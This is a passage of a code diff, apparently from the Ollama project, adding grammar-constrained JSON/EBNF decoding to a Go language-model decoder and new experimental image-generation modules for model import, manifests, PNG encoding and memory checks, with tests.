d.token = sample(logits, d.temp, d.topK, d.topP, d.vocabSize)
|
||||
})
|
||||
// Keep cache state (token auto-kept by AsyncEval)
|
||||
@@ -245,6 +268,15 @@ func (d *Decoder) prefill(inputIDs []int32) int {
|
||||
func (d *Decoder) step() int32 {
|
||||
prevToken := d.token
|
||||
|
||||
// Sync on previous token FIRST to get its value and update grammar state
|
||||
// This must happen before computing the next mask
|
||||
val := prevToken.ItemInt32()
|
||||
|
||||
// Update grammar state with the token we just synced
|
||||
if d.grammar != nil {
|
||||
d.grammar.Accept(int(val))
|
||||
}
|
||||
|
||||
// Save old cache state (reuse preallocated slice)
|
||||
d.oldCacheState = d.oldCacheState[:0]
|
||||
for _, c := range d.caches {
|
||||
@@ -253,6 +285,18 @@ func (d *Decoder) step() int32 {
|
||||
|
||||
withStream(func() {
|
||||
logits := d.model.Forward(mlx.Reshape(prevToken, 1, 1), d.caches)
|
||||
|
||||
// Apply grammar constraints if enabled
|
||||
if d.grammar != nil {
|
||||
// Get last position logits: [1, 1, vocab] -> [vocab]
|
||||
shape := logits.Shape()
|
||||
lastLogits := mlx.Slice(logits, []int32{0, shape[1] - 1, 0}, []int32{1, shape[1], d.vocabSize})
|
||||
lastLogits = mlx.Reshape(lastLogits, d.vocabSize)
|
||||
maskedLogits := d.grammar.ApplyMask(lastLogits)
|
||||
// Reshape back to [1, 1, vocab] for sample()
|
||||
logits = mlx.Reshape(maskedLogits, 1, 1, d.vocabSize)
|
||||
}
|
||||
|
||||
d.token = sample(logits, d.temp, d.topK, d.topP, d.vocabSize)
|
||||
})
|
||||
// Keep token and new cache state so they survive cleanup
|
||||
@@ -262,9 +306,6 @@ func (d *Decoder) step() int32 {
|
||||
}
|
||||
mlx.AsyncEval(d.token)
|
||||
|
||||
// Sync on previous token (GPU already working on next step)
|
||||
val := prevToken.ItemInt32()
|
||||
|
||||
// Free old token and old cache state
|
||||
prevToken.Free()
|
||||
for _, arr := range d.oldCacheState {
|
||||
@@ -289,6 +330,48 @@ func generate(ctx context.Context, m Model, in input, cb func(output)) error {
|
||||
tok := m.Tokenizer()
|
||||
dec := NewDecoder(m, temp, in.TopK, in.TopP)
|
||||
|
||||
// Set up grammar constraint if enabled
|
||||
var grammarEngine *grammar.Engine
|
||||
var grammarVocab []string
|
||||
if (in.JSONMode || in.GrammarEBNF != "") && len(in.Vocab) > 0 {
|
||||
var compiled *grammar.Grammar
|
||||
var err error
|
||||
|
||||
if in.GrammarEBNF != "" {
|
||||
// Custom EBNF grammar
|
||||
startRule := in.GrammarStart
|
||||
if startRule == "" {
|
||||
startRule = "root"
|
||||
}
|
||||
compiled, err = grammar.ParseEBNF(in.GrammarEBNF, startRule)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to parse grammar: %w", err)
|
||||
}
|
||||
fmt.Printf("[Grammar mode: start=%s]\n", startRule)
|
||||
} else {
|
||||
// JSON object grammar (only allows objects at top level)
|
||||
compiled, err = grammar.JSONObjectGrammar()
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to create JSON grammar: %w", err)
|
||||
}
|
||||
fmt.Println("[JSON object mode enabled]")
|
||||
}
|
||||
|
||||
// Pad vocab to match model's vocab size if needed
|
||||
grammarVocab = in.Vocab
|
||||
modelVocabSize := int(m.VocabSize())
|
||||
if len(grammarVocab) < modelVocabSize {
|
||||
padded := make([]string, modelVocabSize)
|
||||
copy(padded, grammarVocab)
|
||||
grammarVocab = padded
|
||||
}
|
||||
grammarEngine, err = grammar.NewEngine(compiled, grammarVocab)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to create grammar engine: %w", err)
|
||||
}
|
||||
defer grammarEngine.Close()
|
||||
}
|
||||
|
||||
// Apply chat template - use image template if we have an image
|
||||
prompt := in.Prompt
|
||||
var tokens []int32
|
||||
@@ -304,6 +387,10 @@ func generate(ctx context.Context, m Model, in input, cb func(output)) error {
|
||||
tokens = tok.Encode(prompt, true)
|
||||
}
|
||||
|
||||
if grammarEngine != nil {
|
||||
dec.SetGrammar(grammarEngine, grammarVocab)
|
||||
}
|
||||
|
||||
prefillStart := time.Now()
|
||||
prefillTokens := dec.prefill(tokens)
|
||||
// Prefill measurement should include time to first token (like mlx-lm)
|
||||
@@ -327,6 +414,11 @@ func generate(ctx context.Context, m Model, in input, cb func(output)) error {
|
||||
if text := streamer.Write(tok.Decode([]int32{firstToken})); text != "" {
|
||||
cb(output{Text: text})
|
||||
}
|
||||
// Check if grammar is complete after first token
|
||||
if dec.grammar != nil && dec.grammar.IsComplete() {
|
||||
cb(output{Done: true, PrefillTokSec: prefillTokSec, GenTokSec: float64(genTokens) / time.Since(genStart).Seconds()})
|
||||
return nil
|
||||
}
|
||||
|
||||
for n := 1; n < maxTokens; n++ {
|
||||
if ctx.Err() != nil {
|
||||
@@ -341,6 +433,10 @@ func generate(ctx context.Context, m Model, in input, cb func(output)) error {
|
||||
if text := streamer.Write(tok.Decode([]int32{token})); text != "" {
|
||||
cb(output{Text: text})
|
||||
}
|
||||
// Check if grammar is complete (valid JSON document finished)
|
||||
if dec.grammar != nil && dec.grammar.IsComplete() {
|
||||
break
|
||||
}
|
||||
|
||||
if n%256 == 0 {
|
||||
mlx.ClearCache()
|
||||
|
||||
@@ -44,6 +44,9 @@ func main() {
|
||||
topP := flag.Float64("top-p", 0.9, "Top-p sampling")
|
||||
topK := flag.Int("top-k", 40, "Top-k sampling")
|
||||
imagePath := flag.String("image", "", "Image path for multimodal models")
|
||||
jsonMode := flag.Bool("json", false, "Enable JSON grammar constraint (output will be valid JSON)")
|
||||
grammarFile := flag.String("grammar", "", "Path to EBNF grammar file for constrained decoding")
|
||||
grammarStart := flag.String("grammar-start", "root", "Start rule name for grammar (default: root)")
|
||||
|
||||
// Image generation params
|
||||
width := flag.Int("width", 1024, "Image width")
|
||||
@@ -98,7 +101,7 @@ func main() {
|
||||
log.Fatal(loadErr)
|
||||
}
|
||||
var img *mlx.Array
|
||||
img, err = m.GenerateFromConfig(&zimage.GenerateConfig{
|
||||
img, err = m.GenerateFromConfig(context.Background(), &zimage.GenerateConfig{
|
||||
Prompt: *prompt,
|
||||
Width: int32(*width),
|
||||
Height: int32(*height),
|
||||
@@ -186,6 +189,20 @@ func main() {
|
||||
}
|
||||
}
|
||||
|
||||
// Get vocab for constrained decoding if needed
|
||||
var vocab []string
|
||||
var grammarEBNF string
|
||||
if *jsonMode || *grammarFile != "" {
|
||||
vocab = m.Tokenizer().Vocab()
|
||||
}
|
||||
if *grammarFile != "" {
|
||||
data, err := os.ReadFile(*grammarFile)
|
||||
if err != nil {
|
||||
log.Fatalf("failed to read grammar file: %v", err)
|
||||
}
|
||||
grammarEBNF = string(data)
|
||||
}
|
||||
|
||||
err = generate(context.Background(), m, input{
|
||||
Prompt: *prompt,
|
||||
Image: image,
|
||||
@@ -194,6 +211,10 @@ func main() {
|
||||
TopP: float32(*topP),
|
||||
TopK: *topK,
|
||||
WiredLimitGB: *wiredLimitGB,
|
||||
JSONMode: *jsonMode,
|
||||
GrammarEBNF: grammarEBNF,
|
||||
GrammarStart: *grammarStart,
|
||||
Vocab: vocab,
|
||||
}, func(out output) {
|
||||
if out.Text != "" {
|
||||
fmt.Print(out.Text)
|
||||
|
||||
183
x/imagegen/create.go
Normal file
183
x/imagegen/create.go
Normal file
@@ -0,0 +1,183 @@
|
||||
package imagegen
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
|
||||
"github.com/ollama/ollama/x/imagegen/safetensors"
|
||||
)
|
||||
|
||||
// IsTensorModelDir checks if the directory contains a tensor model
|
||||
// by looking for model_index.json, which is the standard diffusers pipeline config.
|
||||
func IsTensorModelDir(dir string) bool {
|
||||
_, err := os.Stat(filepath.Join(dir, "model_index.json"))
|
||||
return err == nil
|
||||
}
|
||||
|
||||
// LayerInfo holds metadata for a created layer.
|
||||
type LayerInfo struct {
|
||||
Digest string
|
||||
Size int64
|
||||
MediaType string
|
||||
Name string // Path-style name: "component/tensor" or "path/to/config.json"
|
||||
}
|
||||
|
||||
// LayerCreator is called to create a blob layer.
|
||||
// name is the path-style name (e.g., "tokenizer/tokenizer.json")
|
||||
type LayerCreator func(r io.Reader, mediaType, name string) (LayerInfo, error)
|
||||
|
||||
// TensorLayerCreator creates a tensor blob layer with metadata.
|
||||
// name is the path-style name including component (e.g., "text_encoder/model.embed_tokens.weight")
|
||||
type TensorLayerCreator func(r io.Reader, name, dtype string, shape []int32) (LayerInfo, error)
|
||||
|
||||
// ManifestWriter writes the manifest file.
|
||||
type ManifestWriter func(modelName string, config LayerInfo, layers []LayerInfo) error
|
||||
|
||||
// CreateModel imports an image generation model from a directory.
|
||||
// Stores each tensor as a separate blob for fine-grained deduplication.
|
||||
// Layer creation and manifest writing are done via callbacks to avoid import cycles.
|
||||
func CreateModel(modelName, modelDir string, createLayer LayerCreator, createTensorLayer TensorLayerCreator, writeManifest ManifestWriter, fn func(status string)) error {
|
||||
var layers []LayerInfo
|
||||
var configLayer LayerInfo
|
||||
|
||||
// Components to process - extract individual tensors from each
|
||||
components := []string{"text_encoder", "transformer", "vae"}
|
||||
|
||||
for _, component := range components {
|
||||
componentDir := filepath.Join(modelDir, component)
|
||||
if _, err := os.Stat(componentDir); os.IsNotExist(err) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Find all safetensors files in this component
|
||||
entries, err := os.ReadDir(componentDir)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to read %s: %w", component, err)
|
||||
}
|
||||
|
||||
for _, entry := range entries {
|
||||
if !strings.HasSuffix(entry.Name(), ".safetensors") {
|
||||
continue
|
||||
}
|
||||
|
||||
stPath := filepath.Join(componentDir, entry.Name())
|
||||
|
||||
// Extract individual tensors from safetensors file
|
||||
extractor, err := safetensors.OpenForExtraction(stPath)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to open %s: %w", stPath, err)
|
||||
}
|
||||
|
||||
tensorNames := extractor.ListTensors()
|
||||
fn(fmt.Sprintf("importing %s/%s (%d tensors)", component, entry.Name(), len(tensorNames)))
|
||||
|
||||
for _, tensorName := range tensorNames {
|
||||
td, err := extractor.GetTensor(tensorName)
|
||||
if err != nil {
|
||||
extractor.Close()
|
||||
return fmt.Errorf("failed to get tensor %s: %w", tensorName, err)
|
||||
}
|
||||
|
||||
// Store as minimal safetensors format (88 bytes header overhead)
|
||||
// This enables native mmap loading via mlx_load_safetensors
|
||||
// Use path-style name: "component/tensor_name"
|
||||
fullName := component + "/" + tensorName
|
||||
layer, err := createTensorLayer(td.SafetensorsReader(), fullName, td.Dtype, td.Shape)
|
||||
if err != nil {
|
||||
extractor.Close()
|
||||
return fmt.Errorf("failed to create layer for %s: %w", fullName, err)
|
||||
}
|
||||
layers = append(layers, layer)
|
||||
}
|
||||
|
||||
extractor.Close()
|
||||
}
|
||||
}
|
||||
|
||||
// Import config files
|
||||
configFiles := []string{
|
||||
"model_index.json",
|
||||
"text_encoder/config.json",
|
||||
"text_encoder/generation_config.json",
|
||||
"transformer/config.json",
|
||||
"vae/config.json",
|
||||
"scheduler/scheduler_config.json",
|
||||
"tokenizer/tokenizer.json",
|
||||
"tokenizer/tokenizer_config.json",
|
||||
"tokenizer/vocab.json",
|
||||
}
|
||||
|
||||
for _, cfgPath := range configFiles {
|
||||
fullPath := filepath.Join(modelDir, cfgPath)
|
||||
if _, err := os.Stat(fullPath); os.IsNotExist(err) {
|
||||
continue
|
||||
}
|
||||
|
||||
fn(fmt.Sprintf("importing config %s", cfgPath))
|
||||
|
||||
var r io.Reader
|
||||
|
||||
// For model_index.json, normalize to Ollama format
|
||||
if cfgPath == "model_index.json" {
|
||||
data, err := os.ReadFile(fullPath)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to read %s: %w", cfgPath, err)
|
||||
}
|
||||
|
||||
var cfg map[string]any
|
||||
if err := json.Unmarshal(data, &cfg); err != nil {
|
||||
return fmt.Errorf("failed to parse %s: %w", cfgPath, err)
|
||||
}
|
||||
|
||||
// Rename _class_name to architecture, remove diffusers-specific fields
|
||||
if className, ok := cfg["_class_name"]; ok {
|
||||
cfg["architecture"] = className
|
||||
delete(cfg, "_class_name")
|
||||
}
|
||||
delete(cfg, "_diffusers_version")
|
||||
|
||||
data, err = json.MarshalIndent(cfg, "", " ")
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal %s: %w", cfgPath, err)
|
||||
}
|
||||
r = bytes.NewReader(data)
|
||||
} else {
|
||||
f, err := os.Open(fullPath)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to open %s: %w", cfgPath, err)
|
||||
}
|
||||
defer f.Close()
|
||||
r = f
|
||||
}
|
||||
|
||||
layer, err := createLayer(r, "application/vnd.ollama.image.json", cfgPath)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to create layer for %s: %w", cfgPath, err)
|
||||
}
|
||||
|
||||
// Use model_index.json as the config layer
|
||||
if cfgPath == "model_index.json" {
|
||||
configLayer = layer
|
||||
}
|
||||
|
||||
layers = append(layers, layer)
|
||||
}
|
||||
|
||||
if configLayer.Digest == "" {
|
||||
return fmt.Errorf("model_index.json not found in %s", modelDir)
|
||||
}
|
||||
|
||||
fn(fmt.Sprintf("writing manifest for %s", modelName))
|
||||
|
||||
if err := writeManifest(modelName, configLayer, layers); err != nil {
|
||||
return fmt.Errorf("failed to write manifest: %w", err)
|
||||
}
|
||||
|
||||
fn(fmt.Sprintf("successfully imported %s with %d layers", modelName, len(layers)))
|
||||
return nil
|
||||
}
|
||||
107
x/imagegen/image.go
Normal file
107
x/imagegen/image.go
Normal file
@@ -0,0 +1,107 @@
|
||||
//go:build mlx
|
||||
|
||||
package imagegen
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/base64"
|
||||
"fmt"
|
||||
"image"
|
||||
"image/png"
|
||||
"os"
|
||||
"path/filepath"
|
||||
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
)
|
||||
|
||||
// SaveImage saves an MLX array as a PNG image file.
|
||||
// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
|
||||
func SaveImage(arr *mlx.Array, path string) error {
|
||||
img, err := ArrayToImage(arr)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
if filepath.Ext(path) != ".png" {
|
||||
path = path + ".png"
|
||||
}
|
||||
|
||||
f, err := os.Create(path)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer f.Close()
|
||||
|
||||
return png.Encode(f, img)
|
||||
}
|
||||
|
||||
// EncodeImageBase64 encodes an MLX array as a base64-encoded PNG.
|
||||
// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
|
||||
func EncodeImageBase64(arr *mlx.Array) (string, error) {
|
||||
img, err := ArrayToImage(arr)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
|
||||
var buf bytes.Buffer
|
||||
if err := png.Encode(&buf, img); err != nil {
|
||||
return "", err
|
||||
}
|
||||
|
||||
return base64.StdEncoding.EncodeToString(buf.Bytes()), nil
|
||||
}
|
||||
|
||||
// ArrayToImage converts an MLX array to a Go image.RGBA.
|
||||
// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
|
||||
func ArrayToImage(arr *mlx.Array) (*image.RGBA, error) {
|
||||
shape := arr.Shape()
|
||||
if len(shape) != 4 {
|
||||
return nil, fmt.Errorf("expected 4D array [B, C, H, W], got %v", shape)
|
||||
}
|
||||
|
||||
// Transform to [H, W, C] for image conversion
|
||||
img := mlx.Squeeze(arr, 0)
|
||||
img = mlx.Transpose(img, 1, 2, 0)
|
||||
img = mlx.Contiguous(img)
|
||||
mlx.Eval(img)
|
||||
|
||||
imgShape := img.Shape()
|
||||
H := int(imgShape[0])
|
||||
W := int(imgShape[1])
|
||||
C := int(imgShape[2])
|
||||
|
||||
if C != 3 {
|
||||
img.Free()
|
||||
return nil, fmt.Errorf("expected 3 channels (RGB), got %d", C)
|
||||
}
|
||||
|
||||
// Copy to CPU and free GPU memory
|
||||
data := img.Data()
|
||||
img.Free()
|
||||
|
||||
// Write directly to Pix slice (faster than SetRGBA)
|
||||
goImg := image.NewRGBA(image.Rect(0, 0, W, H))
|
||||
pix := goImg.Pix
|
||||
for y := 0; y < H; y++ {
|
||||
for x := 0; x < W; x++ {
|
||||
srcIdx := (y*W + x) * C
|
||||
dstIdx := (y*W + x) * 4
|
||||
pix[dstIdx+0] = uint8(clampF(data[srcIdx+0]*255+0.5, 0, 255))
|
||||
pix[dstIdx+1] = uint8(clampF(data[srcIdx+1]*255+0.5, 0, 255))
|
||||
pix[dstIdx+2] = uint8(clampF(data[srcIdx+2]*255+0.5, 0, 255))
|
||||
pix[dstIdx+3] = 255
|
||||
}
|
||||
}
|
||||
|
||||
return goImg, nil
|
||||
}
|
||||
|
||||
func clampF(v, min, max float32) float32 {
|
||||
if v < min {
|
||||
return min
|
||||
}
|
||||
if v > max {
|
||||
return max
|
||||
}
|
||||
return v
|
||||
}
|
||||
177
x/imagegen/manifest.go
Normal file
177
x/imagegen/manifest.go
Normal file
@@ -0,0 +1,177 @@
|
||||
package imagegen
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"runtime"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// ManifestLayer represents a layer in the manifest.
|
||||
type ManifestLayer struct {
|
||||
MediaType string `json:"mediaType"`
|
||||
Digest string `json:"digest"`
|
||||
Size int64 `json:"size"`
|
||||
Name string `json:"name,omitempty"` // Path-style name: "component/tensor" or "path/to/config.json"
|
||||
}
|
||||
|
||||
// Manifest represents the manifest JSON structure.
|
||||
type Manifest struct {
|
||||
SchemaVersion int `json:"schemaVersion"`
|
||||
MediaType string `json:"mediaType"`
|
||||
Config ManifestLayer `json:"config"`
|
||||
Layers []ManifestLayer `json:"layers"`
|
||||
}
|
||||
|
||||
// ModelManifest holds a parsed manifest with helper methods.
|
||||
type ModelManifest struct {
|
||||
Manifest *Manifest
|
||||
BlobDir string
|
||||
}
|
||||
|
||||
// DefaultBlobDir returns the default blob storage directory.
|
||||
func DefaultBlobDir() string {
|
||||
home, err := os.UserHomeDir()
|
||||
if err != nil {
|
||||
home = "."
|
||||
}
|
||||
switch runtime.GOOS {
|
||||
case "darwin":
|
||||
return filepath.Join(home, ".ollama", "models", "blobs")
|
||||
case "linux":
|
||||
return filepath.Join(home, ".ollama", "models", "blobs")
|
||||
case "windows":
|
||||
return filepath.Join(home, ".ollama", "models", "blobs")
|
||||
default:
|
||||
return filepath.Join(home, ".ollama", "models", "blobs")
|
||||
}
|
||||
}
|
||||
|
||||
// DefaultManifestDir returns the default manifest storage directory.
|
||||
func DefaultManifestDir() string {
|
||||
home, err := os.UserHomeDir()
|
||||
if err != nil {
|
||||
home = "."
|
||||
}
|
||||
return filepath.Join(home, ".ollama", "models", "manifests")
|
||||
}
|
||||
|
||||
// LoadManifest loads a manifest for the given model name.
|
||||
// Model name format: "modelname" or "modelname:tag" or "host/namespace/name:tag"
|
||||
func LoadManifest(modelName string) (*ModelManifest, error) {
|
||||
manifestPath := resolveManifestPath(modelName)
|
||||
|
||||
data, err := os.ReadFile(manifestPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("read manifest: %w", err)
|
||||
}
|
||||
|
||||
var manifest Manifest
|
||||
if err := json.Unmarshal(data, &manifest); err != nil {
|
||||
return nil, fmt.Errorf("parse manifest: %w", err)
|
||||
}
|
||||
|
||||
return &ModelManifest{
|
||||
Manifest: &manifest,
|
||||
BlobDir: DefaultBlobDir(),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// resolveManifestPath converts a model name to a manifest file path.
|
||||
func resolveManifestPath(modelName string) string {
|
||||
// Parse model name into components
|
||||
// Default: registry.ollama.ai/library/<name>/<tag>
|
||||
host := "registry.ollama.ai"
|
||||
namespace := "library"
|
||||
name := modelName
|
||||
tag := "latest"
|
||||
|
||||
// Handle explicit tag
|
||||
if idx := strings.LastIndex(name, ":"); idx != -1 {
|
||||
tag = name[idx+1:]
|
||||
name = name[:idx]
|
||||
}
|
||||
|
||||
// Handle full path like "host/namespace/name"
|
||||
parts := strings.Split(name, "/")
|
||||
switch len(parts) {
|
||||
case 3:
|
||||
host = parts[0]
|
||||
namespace = parts[1]
|
||||
name = parts[2]
|
||||
case 2:
|
||||
namespace = parts[0]
|
||||
name = parts[1]
|
||||
}
|
||||
|
||||
return filepath.Join(DefaultManifestDir(), host, namespace, name, tag)
|
||||
}
|
||||
|
||||
// BlobPath returns the full path to a blob given its digest.
|
||||
func (m *ModelManifest) BlobPath(digest string) string {
|
||||
// Convert "sha256:abc123" to "sha256-abc123"
|
||||
blobName := strings.Replace(digest, ":", "-", 1)
|
||||
return filepath.Join(m.BlobDir, blobName)
|
||||
}
|
||||
|
||||
// GetTensorLayers returns all tensor layers for a given component.
|
||||
// Component should be "text_encoder", "transformer", or "vae".
|
||||
// Tensor names are path-style: "component/tensor_name" (e.g., "text_encoder/model.embed_tokens.weight").
|
||||
func (m *ModelManifest) GetTensorLayers(component string) []ManifestLayer {
|
||||
prefix := component + "/"
|
||||
var layers []ManifestLayer
|
||||
for _, layer := range m.Manifest.Layers {
|
||||
if layer.MediaType == "application/vnd.ollama.image.tensor" && strings.HasPrefix(layer.Name, prefix) {
|
||||
layers = append(layers, layer)
|
||||
}
|
||||
}
|
||||
return layers
|
||||
}
|
||||
|
||||
// GetConfigLayer returns the config layer for a given path.
|
||||
func (m *ModelManifest) GetConfigLayer(configPath string) *ManifestLayer {
|
||||
for _, layer := range m.Manifest.Layers {
|
||||
if layer.MediaType == "application/vnd.ollama.image.json" && layer.Name == configPath {
|
||||
return &layer
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// ReadConfig reads and returns the content of a config file.
|
||||
func (m *ModelManifest) ReadConfig(configPath string) ([]byte, error) {
|
||||
layer := m.GetConfigLayer(configPath)
|
||||
if layer == nil {
|
||||
return nil, fmt.Errorf("config %q not found in manifest", configPath)
|
||||
}
|
||||
|
||||
blobPath := m.BlobPath(layer.Digest)
|
||||
return os.ReadFile(blobPath)
|
||||
}
|
||||
|
||||
// ReadConfigJSON reads and unmarshals a config file.
|
||||
func (m *ModelManifest) ReadConfigJSON(configPath string, v any) error {
|
||||
data, err := m.ReadConfig(configPath)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
return json.Unmarshal(data, v)
|
||||
}
|
||||
|
||||
// OpenBlob opens a blob for reading.
|
||||
func (m *ModelManifest) OpenBlob(digest string) (io.ReadCloser, error) {
|
||||
return os.Open(m.BlobPath(digest))
|
||||
}
|
||||
|
||||
// HasTensorLayers returns true if the manifest has any tensor layers.
|
||||
func (m *ModelManifest) HasTensorLayers() bool {
|
||||
for _, layer := range m.Manifest.Layers {
|
||||
if layer.MediaType == "application/vnd.ollama.image.tensor" {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
102
x/imagegen/memory.go
Normal file
102
x/imagegen/memory.go
Normal file
@@ -0,0 +1,102 @@
|
||||
// Package imagegen provides experimental image generation capabilities for Ollama.
|
||||
//
|
||||
// This package is in x/ because the tensor model storage format is under development.
|
||||
// The goal is to integrate these capabilities into the main Ollama packages once
|
||||
// the format is stable.
|
||||
//
|
||||
// TODO (jmorganca): Integrate into main packages when stable:
|
||||
// - CLI commands → cmd/
|
||||
// - API endpoints → api/
|
||||
// - Model creation → server/
|
||||
package imagegen
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"runtime"
|
||||
)
|
||||
|
||||
// GB is a convenience constant for gigabytes.
|
||||
const GB = 1024 * 1024 * 1024
|
||||
|
||||
// SupportedBackends lists the backends that support image generation.
|
||||
var SupportedBackends = []string{"metal", "cuda", "cpu"}
|
||||
|
||||
// modelVRAMEstimates maps pipeline class names to their estimated VRAM requirements.
|
||||
var modelVRAMEstimates = map[string]uint64{
|
||||
"ZImagePipeline": 21 * GB, // ~21GB for Z-Image (text encoder + transformer + VAE)
|
||||
"FluxPipeline": 21 * GB, // ~21GB for Flux (same architecture)
|
||||
"QwenImagePipeline": 80 * GB, // TODO: verify actual requirements, using conservative estimate for now
|
||||
}
|
||||
|
||||
// CheckPlatformSupport validates that image generation is supported on the current platform.
|
||||
// Returns nil if supported, or an error describing why it's not supported.
|
||||
func CheckPlatformSupport() error {
|
||||
switch runtime.GOOS {
|
||||
case "darwin":
|
||||
// macOS: Metal is supported via MLX
|
||||
if runtime.GOARCH != "arm64" {
|
||||
return fmt.Errorf("image generation on macOS requires Apple Silicon (arm64), got %s", runtime.GOARCH)
|
||||
}
|
||||
return nil
|
||||
case "linux", "windows":
|
||||
// Linux/Windows: CUDA support (requires mlx or cuda build)
|
||||
// The actual backend availability is checked at runtime
|
||||
return nil
|
||||
default:
|
||||
return fmt.Errorf("image generation is not supported on %s", runtime.GOOS)
|
||||
}
|
||||
}
|
||||
|
||||
// CheckMemoryRequirements validates that there's enough memory for image generation.
|
||||
// Returns nil if memory is sufficient, or an error if not.
|
||||
func CheckMemoryRequirements(modelName string, availableMemory uint64) error {
|
||||
required := EstimateVRAM(modelName)
|
||||
if availableMemory < required {
|
||||
return fmt.Errorf("insufficient memory for image generation: need %d GB, have %d GB",
|
||||
required/GB, availableMemory/GB)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// ResolveModelName checks if a model name is a known image generation model.
|
||||
// Returns the normalized model name if found, empty string otherwise.
|
||||
func ResolveModelName(modelName string) string {
|
||||
manifest, err := LoadManifest(modelName)
|
||||
if err == nil && manifest.HasTensorLayers() {
|
||||
return modelName
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
// EstimateVRAM returns the estimated VRAM needed for an image generation model.
|
||||
// Returns a conservative default of 21GB if the model type cannot be determined.
|
||||
func EstimateVRAM(modelName string) uint64 {
|
||||
manifest, err := LoadManifest(modelName)
|
||||
if err != nil {
|
||||
return 21 * GB
|
||||
}
|
||||
|
||||
data, err := manifest.ReadConfig("model_index.json")
|
||||
if err != nil {
|
||||
return 21 * GB
|
||||
}
|
||||
|
||||
// Parse just the class name
|
||||
var index struct {
|
||||
ClassName string `json:"_class_name"`
|
||||
}
|
||||
if err := json.Unmarshal(data, &index); err != nil {
|
||||
return 21 * GB
|
||||
}
|
||||
|
||||
if estimate, ok := modelVRAMEstimates[index.ClassName]; ok {
|
||||
return estimate
|
||||
}
|
||||
return 21 * GB
|
||||
}
|
||||
|
||||
// HasTensorLayers checks if the given model has tensor layers.
|
||||
func HasTensorLayers(modelName string) bool {
|
||||
return ResolveModelName(modelName) != ""
|
||||
}
|
||||
110
x/imagegen/memory_test.go
Normal file
110
x/imagegen/memory_test.go
Normal file
@@ -0,0 +1,110 @@
|
||||
package imagegen
|
||||
|
||||
import (
|
||||
"runtime"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestCheckPlatformSupport(t *testing.T) {
|
||||
err := CheckPlatformSupport()
|
||||
|
||||
switch runtime.GOOS {
|
||||
case "darwin":
|
||||
if runtime.GOARCH == "arm64" {
|
||||
if err != nil {
|
||||
t.Errorf("Expected nil error on darwin/arm64, got: %v", err)
|
||||
}
|
||||
} else {
|
||||
if err == nil {
|
||||
t.Error("Expected error on darwin/non-arm64")
|
||||
}
|
||||
}
|
||||
case "linux", "windows":
|
||||
if err != nil {
|
||||
t.Errorf("Expected nil error on %s, got: %v", runtime.GOOS, err)
|
||||
}
|
||||
default:
|
||||
if err == nil {
|
||||
t.Errorf("Expected error on unsupported platform %s", runtime.GOOS)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestCheckMemoryRequirements(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
availableMemory uint64
|
||||
wantErr bool
|
||||
}{
|
||||
{
|
||||
name: "sufficient memory",
|
||||
availableMemory: 32 * GB,
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "exactly enough memory",
|
||||
availableMemory: 21 * GB,
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "insufficient memory",
|
||||
availableMemory: 16 * GB,
|
||||
wantErr: true,
|
||||
},
|
||||
{
|
||||
name: "zero memory",
|
||||
availableMemory: 0,
|
||||
wantErr: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
// Use a non-existent model name which will default to 21GB estimate
|
||||
err := CheckMemoryRequirements("nonexistent-model", tt.availableMemory)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("CheckMemoryRequirements() error = %v, wantErr %v", err, tt.wantErr)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestModelVRAMEstimates(t *testing.T) {
|
||||
// Verify the VRAM estimates map has expected entries
|
||||
expected := map[string]uint64{
|
||||
"ZImagePipeline": 21 * GB,
|
||||
"FluxPipeline": 21 * GB,
|
||||
"QwenImagePipeline": 80 * GB,
|
||||
}
|
||||
|
||||
for name, expectedVRAM := range expected {
|
||||
if actual, ok := modelVRAMEstimates[name]; !ok {
|
||||
t.Errorf("Missing VRAM estimate for %s", name)
|
||||
} else if actual != expectedVRAM {
|
||||
t.Errorf("VRAM estimate for %s = %d GB, want %d GB", name, actual/GB, expectedVRAM/GB)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestEstimateVRAMDefault(t *testing.T) {
|
||||
// Non-existent model should return default 21GB
|
||||
vram := EstimateVRAM("nonexistent-model-that-does-not-exist")
|
